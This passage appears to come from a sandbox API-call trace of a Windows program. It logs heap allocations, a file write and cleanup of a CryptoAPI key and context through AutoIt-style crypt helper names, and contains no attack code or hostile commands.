(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2f29340 [0248.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.631] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f29340*, nNumberOfBytesToWrite=0x15328, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29340*, lpNumberOfBytesWritten=0x8cf5e4*=0x15328, lpOverlapped=0x0) returned 1 [0248.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29340 | out: hHeap=0x970000) returned 1 [0248.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0248.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0248.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0248.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0248.637] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0248.638] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.639] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51850, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0248.639] CryptDestroyKey (hKey=0xa87490) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0248.640] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0248.640] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.640] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.640] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.641] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0248.641] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0248.641] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.641] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0248.641] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.641] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.641] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.642] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.642] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0248.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.642] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.698] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.698] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0248.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.698] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.698] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0248.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.698] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0248.699] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.699] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.699] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.699] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0248.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0248.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.700] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.700] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.702] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0248.702] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0248.702] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0248.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.702] FreeLibrary (hLibModule=0x756e0000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0248.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.703] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0248.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.704] CloseHandle (hObject=0x2d0) returned 1 [0248.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0248.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 